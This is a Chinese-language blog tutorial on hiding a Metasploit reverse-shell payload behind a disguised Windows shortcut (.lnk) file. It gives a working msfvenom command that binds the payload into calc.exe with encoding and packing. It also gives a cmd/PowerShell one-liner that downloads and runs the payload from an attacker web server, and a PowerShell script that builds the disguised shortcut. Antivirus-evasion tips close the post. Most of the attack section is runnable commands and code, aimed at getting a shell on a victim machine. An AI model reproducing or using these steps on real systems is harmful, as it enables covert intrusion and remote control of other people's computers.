利用快捷方式隐藏并执行shellcode
0x00:简介
快捷方式是win系统下为各种程序、文件、文件夹提供的一种快速启动程序。
后缀名大多为(.lnk),少见的后缀名有(.pif)、(.url)。
早期的“桌面图标lnk木马”也是危害一时。“恶意程序”通过伪造成正常应用来混淆视听,造成恶意破坏等操作。
0x01:环境准备
1、MSF
2、UPX(pip install upx)
3、数字签名添加器(https://www.ttrar.com/html/7418.html)
4、Phpstudy
5、攻击机器Win7-64位(172.20.10.2)
6、受害者机器Win7-32位(172.20.10.3)
7、攻击机器Kali(172.20.10.14)
0x02:过程
一、MSF生成payload并进行简单的免杀处理
1、编码、捆绑(正常的32位calc.exe)
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=172.20.10.14 LPORT=6667 -x calc.exe -f exe -o jaky.exe
2、加壳、签名
利用upx加壳并生成“jaky666.exe”
添加数字签名
二、Win7-64位 搭建web服务(phpstudy)
启动一个web服务,并把”jaky666.exe”放在目录下。等待被远程下载。
三、恶意Ink部署
1、新建立一个text.txt并填写如下代码
cmd /c (echo powershell "($client = new-object System.Net.WebClient) -and ($client.DownloadFile('http://172.20.10.2/jaky666.exe', ‘jaky666.exe’)) -and (exit)") | cmd && start jaky666.exe2、新建立一个1.ps1并填写如下代码
$file = Get-Content "D:\1\kkkkk\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("D:\1\kkkkk\jaky.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
3、powershell执行1.ps1在当前目录生成“jaky.lnk”
部署完成
接下来
把“jaky.Ink”文件扔给受害者服务器
四、MSF开启监听
五、受害者服务器执行”Ink”
获取到shell
六、查看Ink
0x03:查杀测试
一、本地查杀
二、在线查杀
1、Ink查杀http://r.virscan.org/language/zh-cn/report/e2f14da45f32b03430bd7feb7c384189
(因为快捷方式引用的是cmd.exe,所以上传的程序就是cmd.exe)
2、jaky666.exe查杀
http://r.virscan.org/language/zh-cn/report/8773a7a9dfd1a48becd614e70bc689d3
居然被查杀了
一首(凉凉)送给自己
0x04:闲言碎语
1、图标可以换成正常的应用程序的,方便隐藏
2、Ink快捷方式运行后,会在当前目录下存在“恶意程序”。存放目录还需要改进。或者更加高明的隐藏
3、该“恶意程序”只是做了简单的免杀,甚至并不免杀。这里期待免杀大佬改进
4、好好学习、天天向上
5、技术本无罪,恶意利用技术的人才是魔鬼
6、本文只做技术分享,利用该技术恶意破坏的人,后果自负。